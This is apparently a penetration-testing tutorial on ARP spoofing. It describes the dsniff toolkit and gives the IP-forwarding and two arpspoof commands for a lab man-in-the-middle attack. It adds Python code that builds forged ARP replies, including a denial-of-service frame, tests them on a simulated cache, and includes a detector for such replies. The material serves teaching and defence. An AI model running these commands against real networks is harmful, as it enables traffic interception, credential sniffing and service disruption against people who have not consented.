DENIAL OF SERVICE ATTACKS
Another attack that ARP spoofing makes possible is a denial-of-service attack. It works by associating the router’s IP address with a MAC address that does not exist, which cuts the victim off from the Internet: every frame the victim addresses to its gateway is delivered to a MAC that nobody on the segment answers. The attack is performed by sending the victim a spoofed ARP reply that maps the router’s IP to that nonexistent MAC address. Again, in a real penetration testing engagement you would rarely perform this kind of attack; you would be more focused on the ARP spoofing man-in-the-middle attack itself.
TOOLS OF THE TRADE
Now, let’s look at some of the popular tools that can be used to perform man-in-the-middle attacks.
DSNIFF
Dsniff is called the Swiss army knife of command-line ARP spoofing tools. It is a collection of tools for sniffing various types of traffic. The most popular of them is arpspoof, which is demonstrated next. Dsniff is no longer actively developed or updated, but the tools still work and are well suited to performing man-in-the-middle attacks.
The set of tools includes the following:
arpspoof—Used for poisoning the ARP cache by forging ARP replies
mailsnarf—Used to sniff e-mail messages sent over protocols like SMTP and POP
msgsnarf—Sniffs IM conversations
webspy—Used to sniff the URLs a victim visits in his browser and open them in our own browser as he browses
urlsnarf—Sniffs all the URLs requested over HTTP
macof—Used to perform a MAC flooding attack
USING ARP SPOOF TO PERFORM MITM ATTACKS
Before we perform a man-in-the-middle attack, we need to enable IP forwarding so that the traffic we intercept is forwarded on to its real destination; otherwise the victim simply loses connectivity and the attack is noticed immediately. To enable it, run the following command as root:
echo 1 > /proc/sys/net/ipv4/ip_forward

We can confirm that IP forwarding is enabled by using the cat command to display the contents of the ip_forward file: “1” means IP forwarding is enabled, “0” means it is disabled. The setting does not survive a reboot, and it should be set back to 0 once the test is over.
Now that we have enabled IP forwarding, we need to gather the following information to perform a man-in-the-middle attack:
1. Attacker’s IP
2. Victim’s IP
3. Default gateway
Attacker’s IP—This will be the IP address of my BackTrack machine, which is 192.168.75.138.

Victim’s IP—My victim is a Windows XP machine, which has the IP 192.168.75.142.

Default gateway—The default gateway is the IP address of my router, which is 192.168.75.2.

Next, we take note of the MAC addresses associated with each of these IP addresses.
We can view the MAC addresses in the ARP cache:
From this ARP cache, we can see that we have the MAC address of the default gateway (192.168.75.2) and of our own machine (192.168.75.138). What we want to do is tell the default gateway that the victim’s IP address is associated with our MAC address, and tell the victim that the gateway’s IP address is associated with our MAC address.
Let’s use arpspoof to do this job.
USAGE
The basic syntax for arpspoof is as follows:
arpspoof -i [interface] -t [target host] [host]
Here [host] is the address we want to impersonate toward [target host]: arpspoof keeps sending [target host] forged ARP replies claiming that [host] is at our MAC address. In this case, our interface is “eth0,” and our targets are 192.168.75.2 (gateway) and 192.168.75.142 (victim). So our first command, which poisons the victim, would be as follows:
arpspoof -i eth0 -t 192.168.75.142 192.168.75.2


Taking a look at the victim’s ARP cache again, we find that the gateway’s MAC address has been replaced with our MAC address. So anything the victim sends to the gateway is delivered to us, and because IP forwarding is on, we pass it along to the real gateway.

We also need to issue the same command in the reverse direction, because when we are in the middle we have to poison both ends: the gateway must believe that the victim’s IP belongs to our MAC address too, or the return traffic will bypass us. Since arpspoof stays in the foreground and re-sends its replies until it is stopped, run each instance in its own terminal (on Ctrl-C it sends replies with the correct MAC to restore the original mapping).
arpspoof -i eth0 -t 192.168.75.2 192.168.75.142

If we take a look at the victim’s ARP cache now, the default gateway’s IP address resolves to our MAC address, and on the gateway the victim’s IP address resolves to our MAC address as well. Both directions of traffic between the victim and the Internet now pass through our machine.
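To make concrete what arpspoof is putting on the wire in the two commands above, and what the denial-of-service variant from the earlier section changes, here is an added example (not code from the original page or from dsniff). It builds the unsolicited ARP replies as raw Ethernet frames, applies them to a simulated ARP cache the way a trusting host would, and runs an arpwatch-style check that flags a known IP whose MAC suddenly changes. The IP addresses follow the lab above; the MAC addresses are made up for the example.

```python
"""Added example: forged ARP replies, their effect on an ARP cache, and detection.
Python 3 standard library only. IPs follow the page's lab; MACs are constructed."""
import struct
from ipaddress import IPv4Address

ETH_P_ARP = 0x0806
ARP_REPLY = 2

# Constructed lab values (the MAC addresses are assumptions, not from the page).
ATTACKER_IP, ATTACKER_MAC = "192.168.75.138", "00:0c:29:aa:bb:cc"
VICTIM_IP, VICTIM_MAC = "192.168.75.142", "00:0c:29:11:22:33"
GATEWAY_IP, GATEWAY_MAC = "192.168.75.2", "00:50:56:e0:00:01"
BOGUS_MAC = "de:ad:be:ef:00:00"  # a MAC nobody on the segment owns (DoS variant)


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def build_arp_reply(sender_ip, sender_mac, target_ip, target_mac, eth_src=None) -> bytes:
    """Ethernet II frame carrying an unsolicited ARP reply that claims
    'sender_ip is at sender_mac', unicast to target_mac (what arpspoof -t does).
    The Ethernet source is our real NIC; the lie lives in the ARP payload."""
    eth = struct.pack("!6s6sH", mac_bytes(target_mac),
                      mac_bytes(eth_src or sender_mac), ETH_P_ARP)
    arp = struct.pack("!HHBBH6s4s6s4s",
                      1,              # HTYPE: Ethernet
                      0x0800,         # PTYPE: IPv4
                      6, 4,           # HLEN, PLEN
                      ARP_REPLY,
                      mac_bytes(sender_mac), IPv4Address(sender_ip).packed,
                      mac_bytes(target_mac), IPv4Address(target_ip).packed)
    return eth + arp


def parse_arp(frame: bytes) -> dict:
    """Decode the fields a host's ARP stack acts on (14-byte Ethernet + 28-byte ARP)."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        raise ValueError("not an ARP frame")
    _, _, _, _, op, sha, spa, tha, tpa = struct.unpack("!HHBBH6s4s6s4s", frame[14:42])
    return {"op": op, "sender_ip": str(IPv4Address(spa)), "sender_mac": mac_str(sha),
            "target_ip": str(IPv4Address(tpa)), "target_mac": mac_str(tha)}


def apply_reply(cache: dict, frame: bytes) -> dict:
    """Naive ARP cache update: any reply overwrites the entry for sender_ip,
    solicited or not. This trust is exactly what ARP spoofing abuses."""
    r = parse_arp(frame)
    if r["op"] == ARP_REPLY:
        cache[r["sender_ip"]] = r["sender_mac"]
    return cache


def mitm_frames() -> list:
    """The two replies the page's arpspoof commands send: the victim learns that
    the gateway is at our MAC, and the gateway learns that the victim is at our MAC."""
    return [build_arp_reply(GATEWAY_IP, ATTACKER_MAC, VICTIM_IP, VICTIM_MAC),
            build_arp_reply(VICTIM_IP, ATTACKER_MAC, GATEWAY_IP, GATEWAY_MAC)]


def dos_frame() -> bytes:
    """DoS variant: map the gateway's IP to a MAC nobody owns, so the victim's
    Internet-bound frames go nowhere. Sent from our real NIC (eth_src)."""
    return build_arp_reply(GATEWAY_IP, BOGUS_MAC, VICTIM_IP, VICTIM_MAC, eth_src=ATTACKER_MAC)


def detect_poisoning(frames: list, known: dict) -> list:
    """arpwatch-style check: flag replies whose sender_ip is a known host but whose
    sender_mac differs from the recorded one. Returns (ip, expected_mac, seen_mac)."""
    alerts = []
    for f in frames:
        r = parse_arp(f)
        expected = known.get(r["sender_ip"])
        if r["op"] == ARP_REPLY and expected and expected != r["sender_mac"]:
            alerts.append((r["sender_ip"], expected, r["sender_mac"]))
    return alerts


if __name__ == "__main__":
    victim_cache = {GATEWAY_IP: GATEWAY_MAC, ATTACKER_IP: ATTACKER_MAC}
    gateway_cache = {VICTIM_IP: VICTIM_MAC, ATTACKER_IP: ATTACKER_MAC}
    to_victim, to_gateway = mitm_frames()
    apply_reply(victim_cache, to_victim)
    apply_reply(gateway_cache, to_gateway)
    print("victim cache after poisoning: ", victim_cache)
    print("gateway cache after poisoning:", gateway_cache)
    apply_reply(victim_cache, dos_frame())
    print("victim cache after DoS reply:  ", victim_cache)
    baseline = {GATEWAY_IP: GATEWAY_MAC, VICTIM_IP: VICTIM_MAC}
    print("alerts:", detect_poisoning([to_victim, to_gateway, dos_frame()], baseline))
```

The detection function is the defender's side of the same frames: a baseline of IP-to-MAC pairs for the gateway and key hosts, compared against every ARP reply seen on the segment, catches both the man-in-the-middle replies and the DoS reply, because in each case a known IP shows up with a MAC that is not the one on record.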
